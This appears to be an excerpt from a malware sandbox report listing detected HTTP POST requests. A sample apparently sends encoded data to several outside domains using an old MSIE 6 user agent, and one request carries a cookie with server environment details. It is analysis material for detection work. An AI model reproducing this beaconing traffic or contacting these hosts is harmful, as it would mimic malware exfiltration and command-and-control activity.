                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 30 72 69 73 32 50 75 68 53 41 35 53 48 4b 2b 34 6b 69 38 73 75 4f 52 4a 59 63 73 42 5a 50 71 39 58 79 76 70 72 71 4c 4c 41 63 54 4f 53 32 32 34 57 34 68 55 5a 37 35 67 33 55 75 63 75 54 45 59 56 59 6b 62 49 76 41 77 4d 33 5a 6a 37 72 65 61 67 32 47 69 78 46 78 74 63 58 35 30 79 66 4f 62 43 35 46 65 62 35 7a 43 78 76 43 56 37 2b 31 66 76 33 44 4b 35 41 49 4c 2f 57 75 6d 4f 48 30 4d 70 37 6e 6d 47 75 38 59 67 56 67 51 51 39 2f 4b 69 6b 72 5a 6d 79 77 67 4d 5a 36 6d 41 75 35 49 68 59 61 72 37 62 4a 37 70 7a 4a 4c 4f 39 78 48 78 52 65 6d 65 35 53 36 46 54 5a 37 65 76 62 66 51 54 6a 78 2f 35 43 75 76 6f 70 74 78 42 67 74 35 5a 6e 55 6d 71 38 67 31 72 36 39 70 4b 72 6f 75 50 63 7a 39 6e 44 64 4b 39 38 64 2b 77 30 4a 68 50 36 66 64 45 58 71 30 6f 6e 55 30 39 53 36 41 34 70 38 49 56 2f 62 61 62 4b 37 46 4f 54 61 2f 6d 59 47 56 41 51 73 58 55 6b 32 59 61 4e 64 52 35 6c 46 5a 48 46 72 51 43 5a 6b 45 46 64 38 30 49 70 63 6b 78 63 44 73 69 36 62 35 55 7a 4b 53 55 37 2f 73 79 53 73 38 2b 4c 57 47 5a 76 46 5a 52 4b 42 2f 43 75 51 58 2b 53 56 35 68 4f 6c 75 69 2f 35 6e 39 78 48 46 5a 7a 64 46 38 4c 41 36 68 56 70 77 47 63 36 50 38 2f 36 41 4e 70 30 75 32 6a 5a 4d 7a 51 62 31 54 5a 77 54 4b 61 31 47 50 39 47 55 6e 62 59 2b 6e 62 63 62 2f 59 70 6b 6e 4a 69 39 30 55 48 4f 6c 71 78 43 76 69 66 33 6c 6d 4d 6e 79 58 75 69 6f 6b 37 30 6e 66 30 47 54 39 55 6c 43 47 6a 36 7a 6c 54 73 78 43 6f 51 58 36 32 36 53 71 49 63 4b 30 39 78 70 2b 6a 38 6d 41 34 4f 62 68 34 49 31 4e 47 70 33 71 66 32 38 5a 2b 2b 37 42 38 55 4c 30 74 74 53 62 74 38 36 74 66 6b 6b 36 51 6e 7a 76 66 64 43 6d 4a 58 66 54 46 71 4c 77 4e 70 62 54 47 49 51 59 63 37 71 76 33 72 35 56 5a 78 36 4a 4d 62 7a 61 4d 49 62 30 34 4b 6b 31 49 51 4e 50 2b 50 43 4e 35 57 62 70 78 Data Ascii: 0ris2PuhSA5SHK+4ki8suORJYcsBZPq9XyvprqLLAcTOS224W4hUZ75g3UucuTEYVYkbIvAwM3Zj7reag2GixFxtcX50yfObC5Feb5zCxvCV7+1fv3DK5AIL/WumOH0Mp7nmGu8YgVgQQ9/KikrZmywgMZ6mAu5IhYar7bJ7pzJLO9xHxReme5S6FTZ7evbfQTjx/5CuvoptxBgt5ZnUmq8g1r69pKrouPcz9nDdK98d+w0JhP6fdEXq0onU09S6A4p8IV/babK7FOTa/mYGVAQsXUk2YaNdR5lFZHFrQCZkEFd80IpckxcDsi6b5UzKSU7/sySs8+LWGZvFZRKB/CuQX+SV5hOlui/5n9xHFZzdF8LA6hVpwGc6P8/6ANp0u2jZMzQb1TZwTKa1GP9GUnbY+nbcb/YpknJi90UHOlqxCvif3lmMnyXuiok70nf0GT9UlCGj6zlTsxCoQX626SqIcK09xp+j8mA4Obh4I1NGp3qf28Z++7B8UL0ttSbt86tfkk6QnzvfdCmJXfTFqLwNpbTGIQYc7qv3r5VZx6JMbzaMIb04Kk1IQNP+PCN5Wbpx
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 30 72 69 73 32 50 75 68 53 41 35 53 48 4b 2b 34 6b 69 38 73 75 4f 52 4a 59 63 73 42 5a 50 71 39 58 79 76 70 72 71 4c 4c 41 63 54 4f 53 32 32 34 57 34 68 55 5a 37 35 67 33 55 75 63 75 54 45 59 56 59 6b 62 49 76 41 77 4d 33 5a 6a 37 72 65 61 67 32 47 69 78 46 78 74 63 58 35 30 79 66 4f 62 43 35 46 65 62 35 7a 43 78 76 43 56 37 2b 31 66 76 33 44 4b 35 41 49 4c 2f 57 75 6d 4f 48 30 4d 70 37 6e 6d 47 75 38 59 67 56 67 51 51 39 2f 4b 69 6b 72 5a 6d 79 77 67 4d 5a 36 6d 41 75 35 49 68 59 61 72 37 62 4a 37 70 7a 4a 4c 4f 39 78 48 78 52 65 6d 65 35 53 36 46 54 5a 37 65 76 62 66 51 54 6a 78 2f 35 43 75 76 6f 70 74 78 42 67 74 35 5a 6e 55 6d 71 38 67 31 72 36 39 70 4b 72 6f 75 50 63 7a 39 6e 44 64 4b 39 38 64 2b 77 30 4a 68 50 36 66 64 45 58 71 30 6f 6e 55 30 39 53 36 41 34 70 38 49 56 2f 62 61 62 4b 37 46 4f 54 61 2f 6d 59 47 56 41 51 73 58 55 6b 32 59 61 4e 64 52 35 6c 46 5a 48 46 72 51 43 5a 6b 45 46 64 38 30 49 70 63 6b 78 63 44 73 69 36 62 35 55 7a 4b 53 55 37 2f 73 79 53 73 38 2b 4c 57 47 5a 76 46 5a 52 4b 42 2f 43 75 51 58 2b 53 56 35 68 4f 6c 75 69 2f 35 6e 39 78 48 46 5a 7a 64 46 38 4c 41 36 68 56 70 77 47 63 36 50 38 2f 36 41 4e 70 30 75 32 6a 5a 4d 7a 51 62 31 54 5a 77 54 4b 61 31 47 50 39 47 55 6e 62 59 2b 6e 62 63 62 2f 59 70 6b 6e 4a 69 39 30 55 48 4f 6c 71 78 43 76 69 66 33 6c 6d 4d 6e 79 58 75 69 6f 6b 37 30 6e 66 30 47 54 39 55 6c 43 47 6a 36 7a 6c 54 73 78 43 6f 51 58 36 32 36 53 71 49 63 4b 30 39 78 70 2b 6a 38 6d 41 34 4f 62 68 34 49 31 4e 47 70 33 71 66 32 38 5a 2b 2b 37 42 38 55 4c 30 74 74 53 62 74 38 36 74 66 6b 6b 36 51 6e 7a 76 66 64 43 6d 4a 58 66 54 46 71 4c 77 4e 70 62 54 47 49 51 59 63 37 71 76 33 72 35 56 5a 78 36 4a 4d 62 7a 61 4d 49 62 30 34 4b 6b 31 49 51 4e 50 2b 50 43 4e 35 57 62 70 78 Data Ascii: 0ris2PuhSA5SHK+4ki8suORJYcsBZPq9XyvprqLLAcTOS224W4hUZ75g3UucuTEYVYkbIvAwM3Zj7reag2GixFxtcX50yfObC5Feb5zCxvCV7+1fv3DK5AIL/WumOH0Mp7nmGu8YgVgQQ9/KikrZmywgMZ6mAu5IhYar7bJ7pzJLO9xHxReme5S6FTZ7evbfQTjx/5CuvoptxBgt5ZnUmq8g1r69pKrouPcz9nDdK98d+w0JhP6fdEXq0onU09S6A4p8IV/babK7FOTa/mYGVAQsXUk2YaNdR5lFZHFrQCZkEFd80IpckxcDsi6b5UzKSU7/sySs8+LWGZvFZRKB/CuQX+SV5hOlui/5n9xHFZzdF8LA6hVpwGc6P8/6ANp0u2jZMzQb1TZwTKa1GP9GUnbY+nbcb/YpknJi90UHOlqxCvif3lmMnyXuiok70nf0GT9UlCGj6zlTsxCoQX626SqIcK09xp+j8mA4Obh4I1NGp3qf28Z++7B8UL0ttSbt86tfkk6QnzvfdCmJXfTFqLwNpbTGIQYc7qv3r5VZx6JMbzaMIb04Kk1IQNP+PCN5Wbpx
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 4e 79 77 4c 30 51 33 43 4e 77 36 55 47 49 38 46 68 50 7a 5a 48 38 62 74 73 31 46 37 41 6f 70 2b 6b 56 50 4d 4e 62 56 7a 48 73 35 41 74 6f 73 30 54 47 35 71 50 37 48 47 2f 41 43 66 30 44 36 53 2f 39 69 43 75 67 6d 54 61 54 52 64 68 54 4b 69 6e 4f 6a 4b 53 6e 75 6f 48 41 47 39 71 73 4e 35 41 63 4a 4b 4f 38 31 64 52 78 34 39 50 36 6f 6e 54 4b 73 33 50 48 6a 79 44 73 62 4d 71 4c 45 2f 5a 2b 39 56 61 5a 67 46 68 55 34 61 4b 4a 31 6a 4b 68 46 4c 5a 57 2f 77 43 65 4a 6b 73 57 61 48 73 51 35 64 38 32 39 57 79 4f 72 66 4c 68 51 49 49 6b 51 67 73 45 46 70 68 74 4f 69 6e 33 59 68 2b 49 2b 65 76 68 37 41 6e 77 42 62 55 4f 4a 2b 35 6b 31 2b 79 61 53 4a 53 70 48 54 77 6b 58 79 56 50 79 70 41 4c 6e 4f 39 5a 65 42 33 66 57 4f 67 69 4d 49 4d 39 4f 7a 63 51 5a 70 77 69 2f 55 37 5a 68 78 47 4f 6f 4c 7a 56 2b 68 72 75 39 64 50 6d 69 47 77 4a 2f 64 45 75 53 48 4b 6e 69 42 61 2f 66 44 59 5a 72 6c 46 4b 6d 32 59 70 2b 46 33 47 4f 6f 76 2b 6b 41 4d 4e 58 38 39 54 6a 45 53 50 4c 6e 55 66 6b 50 58 57 6e 31 78 35 68 69 67 7a 48 37 43 61 39 33 53 74 35 4a 42 6d 38 32 49 6e 54 6f 61 35 4b 78 2b 32 4c 35 65 49 7a 79 6a 4e 34 65 78 49 51 6f 2b 37 4b 4f 6f 42 44 6d 64 34 63 6e 30 54 69 75 63 37 75 49 4a 4a 49 70 2b 2f 68 4b 46 54 33 46 59 75 73 51 49 35 31 2f 63 74 6e 71 66 39 49 2f 45 4f 57 74 2b 58 2f 49 4c 49 6f 70 50 44 64 53 48 31 37 50 72 35 55 59 2f 41 55 37 58 58 4e 46 41 2f 6d 77 54 2b 50 6e 48 66 61 57 57 31 44 66 2b 65 62 70 46 38 59 70 45 51 47 61 66 43 42 4f 66 6f 50 62 30 50 49 69 4b 78 75 38 57 6b 67 77 71 68 48 4f 67 72 50 34 38 6b 46 53 70 6a 43 77 7a 48 70 6f 4e 39 70 61 43 41 31 4e 50 77 75 77 51 62 6d 44 44 38 6b 34 51 38 33 4b 75 73 66 6a 6c 75 51 62 6d 59 66 55 69 45 59 53 71 47 52 6d 46 44 6f 4e 4a 77 53 46 63 41 38 64 39 67 3d 3d Data Ascii: NywL0Q3CNw6UGI8FhPzZH8bts1F7Aop+kVPMNbVzHs5Atos0TG5qP7HG/ACf0D6S/9iCugmTaTRdhTKinOjKSnuoHAG9qsN5AcJKO81dRx49P6onTKs3PHjyDsbMqLE/Z+9VaZgFhU4aKJ1jKhFLZW/wCeJksWaHsQ5d829WyOrfLhQIIkQgsEFphtOin3Yh+I+evh7AnwBbUOJ+5k1+yaSJSpHTwkXyVPypALnO9ZeB3fWOgiMIM9OzcQZpwi/U7ZhxGOoLzV+hru9dPmiGwJ/dEuSHKniBa/fDYZrlFKm2Yp+F3GOov+kAMNX89TjESPLnUfkPXWn1x5higzH7Ca93St5JBm82InToa5Kx+2L5eIzyjN4exIQo+7KOoBDmd4cn0Tiuc7uIJJIp+/hKFT3FYusQI51/ctnqf9I/EOWt+X/ILIopPDdSH17Pr5UY/AU7XXNFA/mwT+PnHfaWW1Df+ebpF8YpEQGafCBOfoPb0PIiKxu8WkgwqhHOgrP48kFSpjCwzHpoN9paCA1NPwuwQbmDD8k4Q83KusfjluQbmYfUiEYSqGRmFDoNJwSFcA8d9g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 71 6b 65 68 52 66 70 37 56 41 37 64 45 41 61 78 6e 64 75 49 75 7a 33 62 55 36 35 71 69 78 71 32 7a 6f 58 63 5a 77 4c 53 55 61 48 76 37 69 6f 59 79 35 67 79 4e 72 54 4a 4b 36 59 58 56 79 34 65 76 38 39 69 45 78 78 48 70 74 30 36 4d 2b 32 74 42 50 37 62 6d 38 53 42 58 5a 46 41 5a 4b 39 32 67 32 38 2f 73 48 74 68 49 4d 51 53 4b 6d 76 4a 48 6c 35 35 6e 6d 2f 48 75 4a 5a 6e 54 59 4b 6c 4c 6a 30 34 76 52 2f 4a 49 5a 37 74 56 4f 51 7a 55 53 6c 46 4f 32 31 6c 6a 36 58 46 4b 45 53 71 65 74 2b 36 73 76 45 47 2b 6c 32 2b 65 49 58 64 2f 4e 31 64 69 32 59 4e 46 69 67 55 75 74 63 54 66 72 62 73 46 38 37 6f 4d 62 75 30 73 36 33 67 66 45 69 33 54 44 64 55 51 75 5a 4c 63 35 31 76 4a 4a 6f 77 52 6a 58 64 32 71 5a 58 76 52 69 75 56 36 2b 66 45 72 51 4a 63 4b 32 6f 66 72 66 48 42 44 6d 49 53 4d 75 6f 67 30 53 6d 67 45 69 48 53 37 47 47 68 6e 33 32 58 54 34 65 6c 78 37 6e 52 6b 79 4b 6e 41 77 54 38 42 34 61 45 71 31 63 64 75 74 44 61 69 4b 4e 34 46 71 72 6e 7a 47 36 72 72 6f 4b 31 7a 63 46 78 39 35 71 42 47 66 71 57 54 45 4e 72 66 70 6c 42 62 38 74 79 34 6c 30 70 39 55 33 61 5a 73 64 75 6b 4b 51 63 4c 44 32 6b 71 4f 62 73 6d 54 44 2b 52 56 48 44 79 6e 33 2b 73 38 53 58 42 54 54 57 67 72 74 55 30 6a 31 6a 4f 78 57 33 69 2b 76 46 53 39 48 6a 47 6b 65 64 36 57 38 34 78 78 30 45 75 74 52 36 53 4e 37 34 6e 42 2f 36 71 4d 39 69 7a 4b 63 6f 54 6d 56 70 38 64 53 41 6d 2f 45 42 79 75 69 70 4e 76 31 6f 65 72 67 53 32 4f 5a 35 32 61 73 43 6b 48 61 6e 66 39 42 47 49 65 32 36 68 47 62 4b 69 59 61 73 37 46 37 76 6b 70 6b 48 54 30 42 78 62 38 43 6f 6b 4a 36 51 4b 5a 56 71 2b 61 59 46 75 6a 74 53 39 35 6b Data Ascii: qkehRfp7VA7dEAaxnduIuz3bU65qixq2zoXcZwLSUaHv7ioYy5gyNrTJK6YXVy4ev89iExxHpt06M+2tBP7bm8SBXZFAZK92g28/sHthIMQSKmvJHl55nm/HuJZnTYKlLj04vR/JIZ7tVOQzUSlFO21lj6XFKESqet+6svEG+l2+eIXd/N1di2YNFigUutcTfrbsF87oMbu0s63gfEi3TDdUQuZLc51vJJowRjXd2qZXvRiuV6+fErQJcK2ofrfHBDmISMuog0SmgEiHS7GGhn32XT4elx7nRkyKnAwT8B4aEq1cdutDaiKN4FqrnzG6rroK1zcFx95qBGfqWTENrfplBb8ty4l0p9U3aZsdukKQcLD2kqObsmTD+RVHDyn3+s8SXBTTWgrtU0j1jOxW3i+vFS9HjGked6W84xx0EutR6SN74nB/6qM9izKcoTmVp8dSAm/EByuipNv1oergS2OZ52asCkHanf9BGIe26hGbKiYas7F7vkpkHT0Bxb8CokJ6QKZVq+aYFujtS95k
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 4a 33 4a 65 69 4e 47 6d 56 67 34 6a 6b 53 76 31 63 4c 47 31 78 79 70 6e 4c 79 65 50 55 46 6e 39 6c 63 4a 64 4c 4e 62 50 6e 45 34 5a 44 42 42 56 58 72 54 52 6d 2f 56 50 45 49 39 57 37 70 59 52 33 65 61 33 30 6b 52 4e 56 4c 76 70 49 6f 47 41 7a 61 74 69 6b 71 78 76 53 68 30 61 75 2f 50 42 49 56 5a 6d 31 59 68 55 70 75 34 6a 5a 35 41 55 45 49 36 4e 55 44 7a 30 47 2b 49 5a 48 6a 5a 56 46 33 49 6d 57 4d 39 75 4e 32 30 68 51 6f 30 53 37 6c 43 54 51 53 75 68 36 43 5a 65 76 61 79 62 5a 6e 77 31 4b 6d 35 46 59 39 45 2b 42 6e 33 32 31 54 56 37 41 4a 4e 2b 65 33 4a 4a 69 35 65 50 31 74 6d 6a 52 72 63 42 2f 75 46 33 69 54 76 65 54 4d 42 73 2f 54 38 6c 37 33 37 48 6f 7a 73 32 31 2f 42 36 43 58 4b 30 33 33 35 59 44 47 33 4a 50 7a 58 57 4b 76 2f 65 75 76 42 34 62 2f 46 36 45 4a 45 55 57 38 65 68 33 4b 53 64 6b 64 67 50 4f 59 32 4b 31 36 4b 2f 31 69 32 68 72 42 69 6d 71 76 44 76 64 46 6c 71 55 75 79 2f 33 51 65 4d 39 44 31 53 70 73 2b 79 6d 4b 45 57 50 2f 65 38 6d 63 72 33 73 6c 6a 55 4d 34 35 50 59 6c 2b 30 79 52 64 56 4b 6f 33 50 34 38 55 67 5a 67 65 4d 7a 6a 32 74 35 57 33 4d 43 4a 74 42 4f 31 47 46 69 38 73 6d 53 68 66 62 66 61 2f 6e 6b 38 4f 56 45 71 39 65 69 6c 2f 64 5a 6c 66 34 7a 47 73 53 41 6f 51 70 37 50 6d 43 69 2f 70 71 38 36 39 70 6a 6a 35 42 6e 38 61 79 4e 36 42 53 77 74 63 35 63 45 56 38 53 74 52 2b 73 39 47 4c 4c 4c 44 68 59 6a 52 33 46 72 52 6d 49 57 4a 34 49 6e 70 50 5a 66 54 6e 50 6f 5a 35 49 43 35 79 53 79 4c 69 4e 6b 6f 54 63 31 59 73 4e 35 50 55 78 31 43 38 65 37 47 4f 59 6c 67 4d 6e 63 4c 48 68 73 39 2b 53 6d 37 44 7a 4b 2b 49 69 39 31 42 79 61 33 55 5a 39 74 53 32 7a 63 38 62 7a 47 2f 77 41 56 71 71 51 3d 3d Data Ascii: J3JeiNGmVg4jkSv1cLG1xypnLyePUFn9lcJdLNbPnE4ZDBBVXrTRm/VPEI9W7pYR3ea30kRNVLvpIoGAzatikqxvSh0au/PBIVZm1YhUpu4jZ5AUEI6NUDz0G+IZHjZVF3ImWM9uN20hQo0S7lCTQSuh6CZevaybZnw1Km5FY9E+Bn321TV7AJN+e3JJi5eP1tmjRrcB/uF3iTveTMBs/T8l737Hozs21/B6CXK0335YDG3JPzXWKv/euvB4b/F6EJEUW8eh3KSdkdgPOY2K16K/1i2hrBimqvDvdFlqUuy/3QeM9D1Sps+ymKEWP/e8mcr3sljUM45PYl+0yRdVKo3P48UgZgeMzj2t5W3MCJtBO1GFi8smShfbfa/nk8OVEq9eil/dZlf4zGsSAoQp7PmCi/pq869pjj5Bn8ayN6BSwtc5cEV8StR+s9GLLLDhYjR3FrRmIWJ4InpPZfTnPoZ5IC5ySyLiNkoTc1YsN5PUx1C8e7GOYlgMncLHhs9+Sm7DzK+Ii91Bya3UZ9tS2zc8bzG/wAVqqQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 42 51 6c 4d 6b 36 77 42 56 77 36 68 59 59 38 61 6c 35 46 51 79 37 38 52 2b 74 51 45 77 49 32 65 6f 4e 30 50 49 32 57 51 36 30 54 58 48 70 6e 49 47 6f 57 67 34 55 46 2b 67 68 56 69 4a 47 66 78 79 79 35 6a 32 2f 51 58 58 4f 41 53 48 36 41 45 66 72 72 76 37 48 77 55 33 64 4b 76 53 39 54 38 44 41 59 30 70 56 4f 37 62 78 6f 59 71 4d 77 54 45 6d 78 55 56 68 76 76 32 43 6e 78 54 35 2b 58 5a 61 53 64 2f 39 54 63 74 6b 33 31 4a 62 30 51 6d 4c 2b 68 6b 56 6c 61 6a 62 41 4e 41 6e 6a 6f 31 30 31 6c 62 4d 58 39 67 53 65 47 72 55 79 46 32 62 74 44 51 73 33 6b 4b 6a 70 73 6f 70 4b 2b 44 31 39 34 6b 68 31 6b 36 50 43 61 4e 49 52 6c 4d 51 4d 65 6c 66 7a 32 78 2b 66 41 33 4d 38 36 53 53 72 57 52 44 5a 73 69 73 5a 62 6a 2b 62 39 39 2f 35 30 4e 44 46 79 4c 57 69 39 65 4d 51 4f 70 6a 65 64 33 61 42 75 47 77 77 32 59 46 6a 5a 77 6f 7a 47 61 53 51 58 42 4b 6d 64 76 4b 59 72 79 37 6a 33 32 63 47 6e 32 77 70 39 41 50 5a 45 43 45 35 6f 46 77 4e 4b 74 71 70 56 54 36 58 72 74 36 6f 2b 68 76 5a 4e 41 6c 7a 6e 2b 69 41 36 55 54 66 51 39 50 48 58 5a 32 79 56 36 72 53 68 72 76 47 75 46 73 46 62 68 30 58 6d 59 7a 73 44 4e 44 7a 58 7a 6b 68 64 6d 31 45 51 68 57 57 56 49 63 6a 69 68 48 72 6b 56 43 6d 48 7a 30 47 46 48 71 5a 69 54 4a 6a 58 35 6c 4b 35 37 64 58 50 41 57 58 59 72 6c 56 64 44 6f 63 53 34 37 48 78 33 30 34 34 77 50 74 71 6c 36 71 4f 5a 72 59 33 35 74 4c 67 42 39 38 59 45 75 62 54 58 49 35 79 50 41 51 32 50 2b 62 57 37 51 55 31 42 31 61 65 54 58 34 52 6c 61 4f 62 57 2f 34 41 55 48 68 63 61 2b 43 2b 30 71 59 56 45 6f 73 4d 36 58 47 57 52 58 6d 66 51 6c 57 74 61 31 50 6b 31 69 79 36 52 79 2f 71 32 6d 77 56 49 32 70 56 55 70 51 51 37 57 53 62 36 73 50 4e 59 4a 46 64 71 67 3d 3d Data Ascii: BQlMk6wBVw6hYY8al5FQy78R+tQEwI2eoN0PI2WQ60TXHpnIGoWg4UF+ghViJGfxyy5j2/QXXOASH6AEfrrv7HwU3dKvS9T8DAY0pVO7bxoYqMwTEmxUVhvv2CnxT5+XZaSd/9Tctk31Jb0QmL+hkVlajbANAnjo101lbMX9gSeGrUyF2btDQs3kKjpsopK+D194kh1k6PCaNIRlMQMelfz2x+fA3M86SSrWRDZsisZbj+b99/50NDFyLWi9eMQOpjed3aBuGww2YFjZwozGaSQXBKmdvKYry7j32cGn2wp9APZECE5oFwNKtqpVT6Xrt6o+hvZNAlzn+iA6UTfQ9PHXZ2yV6rShrvGuFsFbh0XmYzsDNDzXzkhdm1EQhWWVIcjihHrkVCmHz0GFHqZiTJjX5lK57dXPAWXYrlVdDocS47Hx3044wPtql6qOZrY35tLgB98YEubTXI5yPAQ2P+bW7QU1B1aeTX4RlaObW/4AUHhca+C+0qYVEosM6XGWRXmfQlWta1Pk1iy6Ry/q2mwVI2pVUpQQ7WSb6sPNYJFdqg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWk1MSXhnY2ZZR09Fb1E4UUxTcm9qUUFBQUVBIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaTUxJeGdjZllHT0VvUThRTFNyb2pRQUFBRUEiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU3MiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiODQuMTcuNTIuNDMiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjU4OTQ0IiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5MDQ4Njk4Mi4xMDg0NzUsIlJFUVVFU1RfVElNRSI6MTY5MDQ4Njk4MiwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6Ijg0LjE3LjUyLjQzIn0%3D; shield-notbot-nonce=6077383c26
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 77 56 76 68 52 6c 32 47 56 41 37 4a 4e 32 54 61 6c 4e 52 58 77 35 5a 4b 76 74 77 4c 70 63 4e 5a 34 66 77 4d 31 5a 2b 43 67 77 57 5a 4c 62 51 34 50 33 33 61 51 43 77 73 6e 62 44 50 56 54 2b 33 56 59 72 4f 51 46 57 33 30 6b 35 30 48 4b 67 52 5a 59 6a 38 46 6a 72 6d 51 39 49 6f 4a 68 6c 4f 70 33 34 2f 71 62 57 6f 72 6c 35 75 69 44 38 61 63 4c 50 38 46 42 30 6c 67 77 51 44 31 76 6e 39 74 75 51 61 61 53 76 34 45 6f 34 77 38 39 2b 55 41 72 52 6b 66 53 39 39 73 45 2b 32 55 49 41 4d 66 68 4d 49 37 36 54 69 43 74 43 4a 4e 77 79 5a 64 68 79 4e 2b 66 30 49 52 6c 52 73 57 6e 55 69 38 37 6f 50 48 2b 69 39 6e 6e 39 50 56 64 52 35 7a 44 72 6f 39 78 51 53 30 6e 39 64 31 77 59 45 4d 69 44 67 2f 31 65 6e 61 63 75 6a 4f 50 45 5a 67 72 6e 2b 6d 55 45 6b 52 73 64 71 33 2f 38 4a 4b 50 46 57 59 75 30 6d 66 2b 45 4d 4a 44 65 6d 58 7a 52 6d 48 37 73 32 54 71 31 63 44 4a 75 4f 33 51 45 38 49 30 59 69 62 76 63 39 53 67 70 51 4e 4d 52 78 6f 6f 50 5a 36 38 63 4b 4e 66 77 4d 33 51 41 34 71 73 71 4a 2b 63 47 75 63 54 4b 4d 79 52 77 31 37 35 6f 6f 35 39 51 49 53 50 4f 74 34 34 43 5a 45 43 30 44 31 37 34 46 4e 44 7a 66 6a 4f 66 46 56 70 34 48 48 66 63 49 53 45 59 42 5a 39 58 51 30 53 43 37 41 75 59 48 43 6b 37 74 4e 4b 53 59 37 56 6d 31 2f 4d 70 73 30 6f 64 49 75 6b 76 64 72 30 6c 4d 42 53 5a 43 7a 6c 63 54 6c 79 64 45 43 32 32 43 35 4e 69 39 4b 39 39 69 66 77 63 35 59 4c 4e 65 34 6e 67 4a 55 45 6d 57 54 2f 73 67 37 4f 36 5a 78 2b 6d 6e 6f 75 41 72 33 4b 4c 64 59 64 42 37 44 2b 47 61 6c 4f 56 2b 43 32 54 62 53 30 58 66 6a 79 57 70 51 49 4f 61 75 54 30 33 42 4f 6a 4b 34 56 70 56 53 7a 6c 6f 62 42 4a 69 6b 71 46 66 45 33 4c 78 37 79 62 43 56 6c 4a 6c 6a 6c 39 37 66 71 61 41 6f 6b 49 3d Data Ascii: 